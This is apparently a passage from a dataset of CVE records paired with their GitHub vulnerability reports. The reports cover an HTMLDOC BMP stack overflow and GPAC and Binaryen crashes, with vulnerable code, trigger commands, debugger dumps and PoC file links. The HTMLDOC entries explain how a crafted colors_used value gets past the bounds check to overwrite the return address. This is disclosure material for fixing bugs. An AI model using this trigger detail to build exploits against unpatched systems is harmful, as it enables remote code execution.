GitCommit:"faecb196815e248d3ecfb03c680a4507229c2a56", GitTreeState:"clean", BuildDate:"2021-01-13T13:20:00Z", GoVersion:"go1.15.5", Compiler:"gc", Platform:"linux/amd64"} ``` - Cloud provider or hardware configuration: - OS (e.g: `cat /etc/os-release`): ``` NAME="Ubuntu" VERSION="16.04.7 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.7 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" VERSION_CODENAME=xenial UBUNTU_CODENAME=xenial ``` - Kernel (e.g. `uname -a`): ``` Linux manager1 4.15.0-140-generic #144~16.04.1-Ubuntu SMP Fri Mar 19 21:24:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux ``` - Install tools: minikube ``` minikube version: v1.19.0 commit: 15cede53bdc5fe242228853e737333b09d4336b5 ``` - Network plugin and version (if this is a network-related bug): - Others: we also reproduced it in Kubernetes (not minikube) version 1.18

ANSI escape characters in kubectl output are not being filtered

https://api.github.com/repos/kubernetes/kubernetes/issues/101695/comments

2021-05-02T12:06:24Z

2023-10-31T11:37:13Z

https://github.com/kubernetes/kubernetes/issues/101695

CVE-2021-43579

2022-01-10T14:10:24.167

A stack-based buffer overflow in image_load_bmp() in HTMLDOC <= 1.9.13 results in remote code execution if the victim converts an HTML document linking to a crafted BMP file.

https://github.com/michaelrsweet/htmldoc/issues/453

github.com

In `image_load_bmp()`, the `colors_used` variable is read from the BMP file header and directly used to read into a fixed-size buffer. ```c static int /* O - 0 = success, -1 = fail */ image_load_bmp(image_t *img, /* I - Image to load into */ FILE *fp, /* I - File to read from */ int gray, /* I - Grayscale image? */ int load_data)/* I - 1 = load image data, 0 = just info */ { ... uchar colormap[256][4]; ... colors_used = read_dword(fp); ... fread(colormap, colors_used, 4, fp); ... } ``` A maliciously crafted BMP file could set the `colors_used` variable to a number big enough to overflow the stack and thus the return address. I am attaching a proof of concept below. It can be tested with: `./htmldoc --webpage -f out.pdf ./poc.html` [poc.zip](https://github.com/michaelrsweet/htmldoc/files/7475732/poc.zip)

Stack buffer overflow in image_load_bmp()

https://api.github.com/repos/michaelrsweet/htmldoc/issues/453/comments

2021-11-04T15:10:19Z

2021-11-15T08:04:53Z

https://github.com/michaelrsweet/htmldoc/issues/453

CVE-2021-43579

2022-01-10T14:10:24.167

A stack-based buffer overflow in image_load_bmp() in HTMLDOC <= 1.9.13 results in remote code execution if the victim converts an HTML document linking to a crafted BMP file.

https://github.com/michaelrsweet/htmldoc/issues/456

github.com

The fix for the issue [stack buffer overflow before 1.9.13](https://github.com/michaelrsweet/htmldoc/issues/453) does not completely protect against a stack buffer overflow in `image_load_bmp()`. It is possible to control the read in buffer `colormap` through the `colors_used` variable. The previous fix does not mitigate the issue as the `color_used` is an `integer`, therefore, regardless of the `unsigned` return of `read_dword(fp)` the buffer can be overflowed. ``` static int /* O - 0 = success, -1 = fail */ image_load_bmp(image_t *img, /* I - Image to load into */ FILE *fp, /* I - File to read from */ int gray, /* I - Grayscale image? */ int load_data)/* I - 1 = load image data, 0 = just info */ { ... uchar colormap[256][4]; ... colors_used = (int)read_dword(fp); ... // Get colormap... if (colors_used == 0 && depth <= 8) colors_used = 1 << depth; else if (colors_used > 256) // colors_used => 0xffffff00 --> -0x100 return (-1); ... fread(colormap, colors_used, 4, fp); ... } ``` As an example, if `colors_used` is `0xffffff00` the if statement validates the variable and leads to a buffer overflow. **Impact** - This buffer overflow can lead to modifying the instruction pointer and can therefore lead to remote code execution.  POC: [vuln_htmldoc_1.9.13.zip](https://github.com/michaelrsweet/htmldoc/files/7696723/vuln_htmldoc_1.9.13.zip)

Stack Buffer Overflow with BMP files - Version 1.9.13

https://api.github.com/repos/michaelrsweet/htmldoc/issues/456/comments

2021-12-11T09:15:18Z

2021-12-18T12:44:27Z

https://github.com/michaelrsweet/htmldoc/issues/456

CVE-2021-46045

2022-01-10T14:11:16.110

GPAC 1.0.1 is affected by: Abort failed. The impact is: cause a denial of service (context-dependent).

https://github.com/gpac/gpac/issues/2007

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC10 ``` [POC10.zip](https://github.com/gpac/gpac/files/7764565/POC10.zip) **Result** ``` Abort ``` **bt** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff697e740 (0x00007ffff697e740) RCX: 0x7ffff74fb18b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffff8060 --> 0x0 RDI: 0x2 RBP: 0x7fffffff83b0 --> 0x7ffff76a0b80 --> 0x0 RSP: 0x7fffffff8060 --> 0x0 RIP: 0x7ffff74fb18b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffff8060 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7fffffff82d0 --> 0x5555555eafa0 --> 0x7374626c ('lbts') R13: 0x10 R14: 0x7ffff7ffb000 --> 0x6565726600001000 R15: 0x1 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff74fb17f <__GI_raise+191>: mov edi,0x2 0x7ffff74fb184 <__GI_raise+196>: mov eax,0xe 0x7ffff74fb189 <__GI_raise+201>: syscall => 0x7ffff74fb18b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff74fb193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff74fb19c <__GI_raise+220>: jne 0x7ffff74fb1c4 <__GI_raise+260> 0x7ffff74fb19e <__GI_raise+222>: mov eax,r8d 0x7ffff74fb1a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff8060 --> 0x0 0008| 0x7fffffff8068 --> 0x0 0016| 0x7fffffff8070 --> 0x5555555e7d50 --> 0x5555555eaa30 --> 0x100010000000006 0024| 0x7fffffff8078 --> 0xf6015b1303ad4900 0032| 0x7fffffff8080 --> 0x5 0040| 0x7fffffff8088 --> 0x5555555e83e0 --> 0x5555555ebe10 --> 0x5555555ebbb0 --> 0x0 0048| 0x7fffffff8090 --> 0x7fffffff81e0 --> 0x0 0056| 0x7fffffff8098 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff74da859 in __GI_abort () at abort.c:79 #2 0x00007ffff75453ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff766f285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff754d47c in malloc_printerr (str=str@entry=0x7ffff7671600 "free(): invalid next size (fast)") at malloc.c:5347 #4 0x00007ffff754ed2c in _int_free (av=0x7ffff76a0b80 <main_arena>, p=0x5555555e1640, have_lock=0x0) at malloc.c:4249 #5 0x00007ffff78cc82b in stco_box_del () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #6 0x00007ffff78f8b6c in gf_isom_box_del () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #7 0x00007ffff78f8b9f in gf_isom_box_del () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #8 0x00007ffff78f8b9f in gf_isom_box_del () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #9 0x00007ffff78f8b9f in gf_isom_box_del () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #10 0x00007ffff78f8b9f in gf_isom_box_del () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #11 0x00007ffff78f8b9f in gf_isom_box_del () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #12 0x00007ffff78f9bc7 in gf_isom_box_array_del () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #13 0x00007ffff79031b7 in gf_isom_delete_movie () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #14 0x00007ffff79064c3 in gf_isom_close () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #15 0x000055555557bd12 in mp4boxMain () #16 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #17 0x000055555556d45e in _start () gdb-peda$ ```

Abort failed in MP4Box

https://api.github.com/repos/gpac/gpac/issues/2007/comments

2021-12-22T18:37:49Z

2022-01-03T11:24:53Z

https://github.com/gpac/gpac/issues/2007

CVE-2021-46046

2022-01-10T14:11:16.600

A Pointer Derefernce Vulnerbility exists GPAC 1.0.1 the gf_isom_box_size function, which could cause a Denial of Service (context-dependent).

https://github.com/gpac/gpac/issues/2005

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC8 ``` [POC8.zip](https://github.com/gpac/gpac/files/7764356/POC8.zip) **Result** ``` Segmentation fault. ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff78fa0da in gf_isom_box_size () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA [ REGISTERS ] RAX 0x5b47555e0072 RBX 0x5b47555e0072 RCX 0x0 RDX 0x0 RDI 0x5b47555e0072 RSI 0x2 R8 0x0 R9 0x7fffffff7f80 ◂— 0x2 R10 0x7ffff76d4546 ◂— 'gf_list_insert' R11 0x7ffff7773a80 (gf_list_insert) ◂— endbr64 R12 0x5555555db580 —▸ 0x5555555e2740 —▸ 0x5555555db330 ◂— 0x6d766864 /* 'dhvm' */ R13 0x5555555e2600 ◂— 0x6d6f6f76 /* 'voom' */ R14 0x6 R15 0x0 RBP 0x2 RSP 0x7fffffff7f80 ◂— 0x2 RIP 0x7ffff78fa0da (gf_isom_box_size+10) ◂— mov rax, qword ptr [rdi + 0x10] [ DISASM ] ► 0x7ffff78fa0da <gf_isom_box_size+10> mov rax, qword ptr [rdi + 0x10] 0x7ffff78fa0de <gf_isom_box_size+14> mov rbp, rdi 0x7ffff78fa0e1 <gf_isom_box_size+17> mov edx, dword ptr [rax + 0x58] 0x7ffff78fa0e4 <gf_isom_box_size+20> test edx, edx 0x7ffff78fa0e6 <gf_isom_box_size+22> je gf_isom_box_size+40 <gf_isom_box_size+40> ↓ 0x7ffff78fa0f8 <gf_isom_box_size+40> cmp dword ptr [rdi], 0x75756964 0x7ffff78fa0fe <gf_isom_box_size+46> mov qword ptr [rdi + 8], 8 0x7ffff78fa106 <gf_isom_box_size+54> mov edx, 0xc 0x7ffff78fa10b <gf_isom_box_size+59> jne gf_isom_box_size+74 <gf_isom_box_size+74> ↓ 0x7ffff78fa11a <gf_isom_box_size+74> cmp byte ptr [rax + 0x3c], 0 0x7ffff78fa11e <gf_isom_box_size+78> je gf_isom_box_size+84 <gf_isom_box_size+84> [ STACK ] 00:0000│ r9 rsp 0x7fffffff7f80 ◂— 0x2 01:0008│ 0x7fffffff7f88 —▸ 0x7ffff78fa19a (gf_isom_box_array_size+74) ◂— mov r15d, eax 02:0010│ 0x7fffffff7f90 ◂— 0x400000000 03:0018│ 0x7fffffff7f98 —▸ 0x5555555da950 ◂— 0x0 04:0020│ 0x7fffffff7fa0 —▸ 0x5555555df7a0 —▸ 0x5555555e61c0 ◂— 0xfbad2480 05:0028│ 0x7fffffff7fa8 ◂— 0x0 06:0030│ 0x7fffffff7fb0 —▸ 0x7fffffff8480 ◂— 0x5f2 07:0038│ 0x7fffffff7fb8 —▸ 0x7fffffff8490 ◂— 0x0 [ BACKTRACE ] ► f 0 0x7ffff78fa0da gf_isom_box_size+10 f 1 0x7ffff78fa19a gf_isom_box_array_size+74 f 2 0x7ffff7910e8d inplace_shift_mdat+813 f 3 0x7ffff791549c WriteToFile+3884 f 4 0x7ffff7906432 gf_isom_write+370 f 5 0x7ffff79064b8 gf_isom_close+24 f 6 0x55555557bd12 mp4boxMain+7410 f 7 0x7ffff74dc0b3 __libc_start_main+243 pwndbg> bt #0 0x00007ffff78fa0da in gf_isom_box_size () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #1 0x00007ffff78fa19a in gf_isom_box_array_size () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #2 0x00007ffff7910e8d in inplace_shift_mdat () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #3 0x00007ffff791549c in WriteToFile () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #4 0x00007ffff7906432 in gf_isom_write () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #5 0x00007ffff79064b8 in gf_isom_close () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #6 0x000055555557bd12 in mp4boxMain () #7 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #8 0x000055555556d45e in _start () ```

Untrusted pointer dereference in gf_isom_box_size ()

https://api.github.com/repos/gpac/gpac/issues/2005/comments

2021-12-22T17:52:53Z

2022-01-03T11:24:25Z

https://github.com/gpac/gpac/issues/2005

CVE-2021-46047

2022-01-10T14:11:17.010

A Pointer Dereference Vulnerability exists in GPAC 1.0.1 via the gf_hinter_finalize function.

https://github.com/gpac/gpac/issues/2008

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC5 ``` [POC5.zip](https://github.com/gpac/gpac/files/7764645/POC5.zip) **Result** ``` Abort ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x400001 RBX: 0x0 RCX: 0x0 RDX: 0x5555555e8080 --> 0x7374737a ('zsts') RSI: 0x0 RDI: 0x5555555db330 --> 0x5555555e0620 --> 0x5555555dfa20 --> 0x7472616b ('kart') RBP: 0x5555555da950 --> 0x0 RSP: 0x7fffffff5c30 --> 0x7fffffff7040 --> 0xffffffff RIP: 0x7ffff7a107d0 (<gf_hinter_finalize+1040>: movzx eax,WORD PTR [r15+0x2]) R8 : 0x0 R9 : 0x5555555eac20 --> 0x5555555eab70 --> 0x5555555ea8a0 --> 0x0 R10: 0x5555555e3860 --> 0x7374626c ('lbts') R11: 0x7ffff76a0be0 --> 0x5555555eacc0 --> 0x0 R12: 0x5555555e82c0 --> 0x10002 R13: 0x5 R14: 0x7fffffff5cb0 ("a=x-copyright: MP4/3GP File hinted with GPAC 1.1.0-DEV-rev1574-g8b22f0912-master - (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io") R15: 0x0 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff7a107c4 <gf_hinter_finalize+1028>: call 0x7ffff7768fd0 <gf_isom_sdp_add_line@plt> 0x7ffff7a107c9 <gf_hinter_finalize+1033>: jmp 0x7ffff7a1041e <gf_hinter_finalize+94> 0x7ffff7a107ce <gf_hinter_finalize+1038>: xchg ax,ax => 0x7ffff7a107d0 <gf_hinter_finalize+1040>: movzx eax,WORD PTR [r15+0x2] 0x7ffff7a107d5 <gf_hinter_finalize+1045>: cmp WORD PTR [r15+0x4],ax 0x7ffff7a107da <gf_hinter_finalize+1050>: jne 0x7ffff7a10657 <gf_hinter_finalize+663> 0x7ffff7a107e0 <gf_hinter_finalize+1056>: jmp 0x7ffff7a10650 <gf_hinter_finalize+656> 0x7ffff7a107e5 <gf_hinter_finalize+1061>: nop DWORD PTR [rax] [------------------------------------stack-------------------------------------] 0000| 0x7fffffff5c30 --> 0x7fffffff7040 --> 0xffffffff 0008| 0x7fffffff5c38 --> 0x100000000 0016| 0x7fffffff5c40 --> 0x2 0024| 0x7fffffff5c48 --> 0x7ffff76a15c0 --> 0xfbad2887 0032| 0x7fffffff5c50 --> 0x1 0040| 0x7fffffff5c58 --> 0x25 ('%') 0048| 0x7fffffff5c60 --> 0x25 ('%') 0056| 0x7fffffff5c68 --> 0x7ffff76a24a0 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ffff7a107d0 in gf_hinter_finalize () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 gdb-peda$ bt #0 0x00007ffff7a107d0 in gf_hinter_finalize () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 #1 0x000055555557967d in HintFile () #2 0x000055555557d257 in mp4boxMain () #3 0x00007ffff74dc0b3 in __libc_start_main (main=0x55555556d420 <main>, argc=0x3, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:308 #4 0x000055555556d45e in _start () ```

Untrusted pointer dereference in gf_hinter_finalize ()

https://api.github.com/repos/gpac/gpac/issues/2008/comments

2021-12-22T18:56:01Z

2022-01-03T11:21:14Z

https://github.com/gpac/gpac/issues/2008

CVE-2021-46048

2022-01-10T14:11:17.663

A Denial of Service vulnerability exists in Binaryen 104 due to an assertion abort in wasm::WasmBinaryBuilder::readFunctions.

https://github.com/WebAssembly/binaryen/issues/4412

github.com

**Version:** ``` version_104 ``` **command:** ``` wasm-opt POC7 ``` [POC7.zip](https://github.com/WebAssembly/binaryen/files/7775613/POC7.zip) **Result** ``` abort ``` **bt** ``` Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffff4416040 (0x00007ffff4416040) RCX: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffff9970 --> 0x0 RDI: 0x2 RBP: 0x7ffff45d5588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n") RSP: 0x7fffffff9970 --> 0x0 RIP: 0x7ffff446018b (<__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffff9970 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffff7b29060 ("/home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp") R13: 0x8d4 R14: 0x7ffff7b2b8e0 ("exceptionTargetNames.empty()") R15: 0x615000006200 --> 0x60300001aba0 --> 0x30246c6562616c ('label$0') EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff446017f <__GI_raise+191>: mov edi,0x2 0x7ffff4460184 <__GI_raise+196>: mov eax,0xe 0x7ffff4460189 <__GI_raise+201>: syscall => 0x7ffff446018b <__GI_raise+203>: mov rax,QWORD PTR [rsp+0x108] 0x7ffff4460193 <__GI_raise+211>: xor rax,QWORD PTR fs:0x28 0x7ffff446019c <__GI_raise+220>: jne 0x7ffff44601c4 <__GI_raise+260> 0x7ffff446019e <__GI_raise+222>: mov eax,r8d 0x7ffff44601a1 <__GI_raise+225>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffff9970 --> 0x0 0008| 0x7fffffff9978 --> 0x4cb020 (<free>: push rbp) 0016| 0x7fffffff9980 --> 0xfbad8000 --> 0x0 0024| 0x7fffffff9988 --> 0x612000000340 --> 0x74706f2d63000001 0032| 0x7fffffff9990 --> 0x6120000003a5 ("Builder::readFunctions(): Assertion `exceptionTargetNames.empty()' failed.\n") 0040| 0x7fffffff9998 --> 0x612000000340 --> 0x74706f2d63000001 0048| 0x7fffffff99a0 --> 0x612000000340 --> 0x74706f2d63000001 0056| 0x7fffffff99a8 --> 0x6120000003f0 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff443f859 in __GI_abort () at abort.c:79 #2 0x00007ffff443f729 in __assert_fail_base (fmt=0x7ffff45d5588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x7ffff7b2b8e0 <str> "exceptionTargetNames.empty()", file=0x7ffff7b29060 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp", line=0x8d4, function=<optimized out>) at assert.c:92 #3 0x00007ffff4450f36 in __GI___assert_fail (assertion=0x7ffff7b2b8e0 <str> "exceptionTargetNames.empty()", file=0x7ffff7b29060 <str> "/home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp", line=0x8d4, function=0x7ffff7b2b840 <__PRETTY_FUNCTION__._ZN4wasm17WasmBinaryBuilder13readFunctionsEv> "void wasm::WasmBinaryBuilder::readFunctions()") at assert.c:101 #4 0x00007ffff6ea794d in wasm::WasmBinaryBuilder::readFunctions (this=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp:2260 #5 0x00007ffff6e988a2 in wasm::WasmBinaryBuilder::read (this=0x7fffffffa6e0) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-binary.cpp:1426 #6 0x00007ffff7046785 in wasm::ModuleReader::readBinaryData (this=<optimized out>, input=..., wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:63 #7 0x00007ffff7046f76 in wasm::ModuleReader::readBinary (this=<optimized out>, filename=<incomplete type>, wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:74 #8 0x00007ffff7047e1c in wasm::ModuleReader::read (this=<optimized out>, filename=<incomplete type>, wasm=..., sourceMapFilename=<incomplete type>) at /home/zxq/CVE_testing/project/binaryen/src/wasm/wasm-io.cpp:97 #9 0x00000000006ae0ff in main (argc=<optimized out>, argv=<optimized out>) at /home/zxq/CVE_testing/project/binaryen/src/tools/wasm-opt.cpp:249 #10 0x00007ffff44410b3 in __libc_start_main (main=0x6a6b70 <main(int, char const**)>, argc=0x2, argv=0x7fffffffe328, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe318) at ../csu/libc-start.c:308 #11 0x0000000000452bde in _start () at /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/iostream:74 ```

A abort failure in wasm::WasmBinaryBuilder::readFunctions

https://api.github.com/repos/WebAssembly/binaryen/issues/4412/comments

2021-12-25T07:56:15Z

2022-01-05T01:17:23Z

https://github.com/WebAssembly/binaryen/issues/4412

CVE-2021-46049

2022-01-10T14:11:18.057

A Pointer Dereference Vulnerability exists in GPAC 1.0.1 via the gf_fileio_check function, which could cause a Denial of Service.

https://github.com/gpac/gpac/issues/2013

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -par 1=4:3 POC13 ``` [POC13.zip](https://github.com/gpac/gpac/files/7773107/POC13.zip) **Result** ```Segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x5555555db320 --> 0x5dfd555e1548 RCX: 0x0 RDX: 0x0 RSI: 0x8a8000032c4 RDI: 0x5dfd555e1548 RBP: 0x5dfd555e1548 RSP: 0x7fffffff7fa8 --> 0x7ffff777227c (<gf_fseek+28>: test eax,eax) RIP: 0x7ffff77718e2 (<gf_fileio_check+50>: mov edx,DWORD PTR [rdi]) R8 : 0x5555555e0e80 --> 0x7ffff76a11e0 --> 0x7ffff76a11d0 --> 0x7ffff76a11c0 --> 0x7ffff76a11b0 --> 0x7ffff76a11a0 (--> ...) R9 : 0x0 R10: 0x7ffff76d4625 ("gf_bs_write_long_int") R11: 0x7ffff77747d0 (<gf_bs_write_long_int>: endbr64) R12: 0x8a8000032c4 R13: 0x0 R14: 0x7fffffff84b0 --> 0x0 R15: 0x7fffffff8010 --> 0x5555555c7060 --> 0x0 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff77718db <gf_fileio_check+43>: je 0x7ffff77718f8 <gf_fileio_check+72> 0x7ffff77718dd <gf_fileio_check+45>: test rdi,rdi 0x7ffff77718e0 <gf_fileio_check+48>: je 0x7ffff77718f8 <gf_fileio_check+72> => 0x7ffff77718e2 <gf_fileio_check+50>: mov edx,DWORD PTR [rdi] 0x7ffff77718e4 <gf_fileio_check+52>: test edx,edx 